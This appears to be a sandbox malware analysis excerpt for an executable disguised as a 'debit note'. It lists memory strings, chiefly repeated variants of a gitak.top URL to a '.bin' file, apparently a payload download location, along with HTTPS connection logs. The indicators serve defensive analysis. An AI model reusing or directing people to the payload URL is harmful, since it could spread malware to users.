    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin/
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin/KGukxUu155.bin
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin/KGukxUu155.binID=
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin/a
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin/m
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin/u
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin0
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin:
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin?o
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.binID=
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.binR
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin_
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bina
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bincy
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bine
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.binificateChainPolicy
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bink
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.binl
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.binm
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bino(
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.binu
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.binurT
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin~5
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin~53
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/a
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/m
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/u
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.12739260417.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12633967289.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160436121.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11897223878.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265722845.0000000005BF7000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15156086659.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11476497728.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.0000000007570000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14841282529.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000753780.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11581843152.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15365675266.0000000005C53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.12739260417.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15470510829.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12633967289.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11897223878.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15156086659.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.0000000007570000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14841282529.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15680230484.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000753780.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15365675266.0000000005C53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
